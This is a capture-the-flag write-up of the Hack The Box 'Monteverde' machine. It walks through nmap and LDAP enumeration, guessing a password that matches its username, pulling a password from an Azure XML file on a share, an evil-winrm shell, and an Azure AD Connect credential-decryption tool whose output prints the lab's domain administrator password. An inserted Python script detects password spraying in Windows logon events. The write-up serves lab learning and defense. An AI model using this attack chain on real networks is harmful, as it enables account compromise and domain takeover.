Monteverde

With one of the first machines I did on Hack The Box retiring, I can finally start publishing some of the writeups I have done for these pen-testing labs.

Foothold

As always, the first step for any box is to see what is available to access:

Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-26 15:25 AEST
Nmap scan report for monteverde.htb (10.10.10.172)
Host is up (0.29s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE
53/tcp   open  domain
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
464/tcp  open  kpasswd5
593/tcp  open  http-rpc-epmap
636/tcp  open  ldapssl
3268/tcp open  globalcatLDAP
3269/tcp open  globalcatLDAPssl
Nmap done: 1 IP address (1 host up) scanned in 15.25 seconds

The nmap scan shows LDAP open to the world (naughty boys), and worse, an unauthenticated search lets us enumerate the users, revealing a list of usernames:

Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
smorgan

Some quick testing against the SMB port reveals that a lazy administrator has set the SABatchJobs password to the username, giving us a set of valid credentials:

SABatchJobs:SABatchJobs

With these, we can start to read the shares.
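As an added example (not part of the original writeup), here is the defender's view of the guessing that found SABatchJobs: a small Python check over Windows Security-log logon events that flags one source failing against many distinct accounts in a short window and then logging in successfully. The events, timestamps and source IPs below are constructed sample data; the usernames are the ones enumerated above.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample Security-log events: (time, event ID, account, source IP).
# 4625 = failed logon, 4624 = successful logon. The IPs are made up.
SAMPLE_EVENTS = [
    ("2020-05-26 15:30:01", 4625, "mhope",       "10.10.14.5"),
    ("2020-05-26 15:30:02", 4625, "svc-ata",     "10.10.14.5"),
    ("2020-05-26 15:30:03", 4625, "svc-bexec",   "10.10.14.5"),
    ("2020-05-26 15:30:04", 4625, "svc-netapp",  "10.10.14.5"),
    ("2020-05-26 15:30:05", 4625, "dgalanos",    "10.10.14.5"),
    ("2020-05-26 15:30:06", 4625, "smorgan",     "10.10.14.5"),
    ("2020-05-26 15:30:07", 4624, "SABatchJobs", "10.10.14.5"),
    ("2020-05-26 15:45:00", 4625, "dgalanos",    "10.10.14.9"),  # one typo, not a spray
]


def _parse(ts):
    return datetime.strptime(ts, "%Y-%m-%d %H:%M:%S")


def detect_spray(events, window=timedelta(minutes=5), min_accounts=4):
    """Return {source_ip: {"accounts": [...], "landed": [...]}} for every source
    that failed logons against at least `min_accounts` distinct accounts inside
    one `window`. "landed" lists accounts that source then logged into."""
    failures = defaultdict(list)   # source -> [(time, account)]
    successes = defaultdict(list)  # source -> [(time, account)]
    for ts, event_id, account, src in events:
        if event_id == 4625:
            failures[src].append((_parse(ts), account))
        elif event_id == 4624:
            successes[src].append((_parse(ts), account))

    hits = {}
    for src, fails in failures.items():
        fails.sort()
        sprayed = set()
        start = 0
        for end in range(len(fails)):
            # Advance the window start until the span fits inside `window`.
            while fails[end][0] - fails[start][0] > window:
                start += 1
            accounts = {acct for _, acct in fails[start:end + 1]}
            if len(accounts) >= min_accounts:
                sprayed |= accounts
        if sprayed:
            first_fail = fails[0][0]
            landed = sorted({a for t, a in successes[src] if t >= first_fail})
            hits[src] = {"accounts": sorted(sprayed), "landed": landed}
    return hits
```

A source that trips the threshold and also appears in "landed" is the case worth paging on: the spray found a password, which is exactly what happened on this box.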

User

In the user share, in mhope's folder, we find an azure.xml with a password in it; this gives us the password for the mhope account:

mhope:4n0therD4y@n0th3r$

Not much else is to be found on the shares, but we can use these creds with evil-winrm to get a remote shell. Now we are talking, and we have user!

Root

With the user flag obtained, we go back to enumerating the host to see what we can use for privesc. One of the first things to check is group membership, which shows mhope is a member of the Azure Admins group, and we can also see the Azure AD Connect service running. Some searching later, we find this can be used for privesc by decrypting the credentials Azure AD Connect stores in its database. Using the exploit at https://vbscrub.com/2020/01/14/azure-ad-connect-database-exploit-priv-esc/ we get a result:

*Evil-WinRM* PS C:\Program Files\Microsoft Azure AD Sync\Bin> c:/temp/AdDecrypt.exe -FullSQL

======================
AZURE AD SYNC CREDENTIAL DECRYPTION TOOL
Based on original code from: https://github.com/fox-it/adconnectdump
======================

Opening database connection...
Executing SQL commands...
Closing database connection...
Decrypting XML...
Parsing XML...
Finished!

DECRYPTED CREDENTIALS:
Username: administrator
Password: d0m@in4dminyeah!
Domain: MEGABANK.LOCAL

With these credentials we can log in and collect the root flag for an owned box!